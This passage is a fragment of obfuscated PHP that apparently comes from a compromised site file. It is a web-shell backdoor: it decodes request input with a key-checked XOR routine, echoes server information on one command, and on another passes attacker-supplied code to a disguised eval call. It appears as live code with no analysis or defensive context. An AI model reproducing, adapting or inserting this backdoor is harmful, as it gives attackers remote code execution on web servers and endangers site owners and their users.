4b537e'][33].$tf7ebf['l94b537e'][9].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][84].$tf7ebf['l94b537e'][83].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][9].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][9].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][14].$tf7ebf['l94b537e'][59].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][9].$tf7ebf['l94b537e'][47].$tf7ebf['l94b537e'][14].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][83].$tf7ebf['l94b537e'][83].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][96].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][47].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][47];global$jc17;function c2c1a($j1cf72,$x261be0){global$tf7ebf;$xe957e="";for($a05a=0;$a05a$tf7ebf['l94b537e'][38].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][33];){for($q31e1=0;$q31e1$tf7ebf['l94b537e'][38].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][33]&&$a05a$tf7ebf['l94b537e'][38].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][16].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][33];$q31e1++,$a05a++){$xe957e.=$tf7ebf$tf7ebf['l94b537e'][81].$tf7ebf['l94b537e'][96].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][12];}}return$xe957e;}function c476400($j1cf72,$x261be0){global$tf7ebf;global$jc17;return$tf7ebf$tf7ebf['l94b537e'][19].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][14].$tf7ebf['l94b537e'][47].$tf7ebf['l94b537e'][33];}foreach($tf7ebf[$tf7ebf['l94b537e'][1].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][14].$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][20]]as$x261be0=>$f5a8){$j1cf72=$f5a8;$xefb=$x261be0;}if(!$j1cf72){foreach($tf7ebf[$tf7ebf['l94b537e'][81].$tf7ebf['l94b537e'][59].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][83].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][21]]as$x261be0=>$f5a8){$j1cf72=$f5a8;$xefb=$x261be0;}}$j1cf72=@$tf7ebf$tf7ebf['l94b537e'][31].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][84].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][62];if(isset($j1cf72[$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][28]])&&$jc17==$j1cf72[$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][28]]){if($j1cf72[$tf7ebf['l94b537e'][32]]==$tf7ebf['l94b537e'][85]){$a05a=Array($tf7ebf['l94b537e'][66].$tf7ebf['l94b537e'][38]=>@$tf7ebf$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][71],$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][38]=>$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][74].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][9].$tf7ebf['l94b537e'][62],);echo@$tf7ebf$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][21];}elseif($j1cf72[$tf7ebf['l94b537e'][32]]==$tf7ebf['l94b537e'][30]){eval/a684ebc/($j1cf72[$tf7ebf['l94b537e'][71]]);}exit();} ?>
2 | 


--------------------------------------------------------------------------------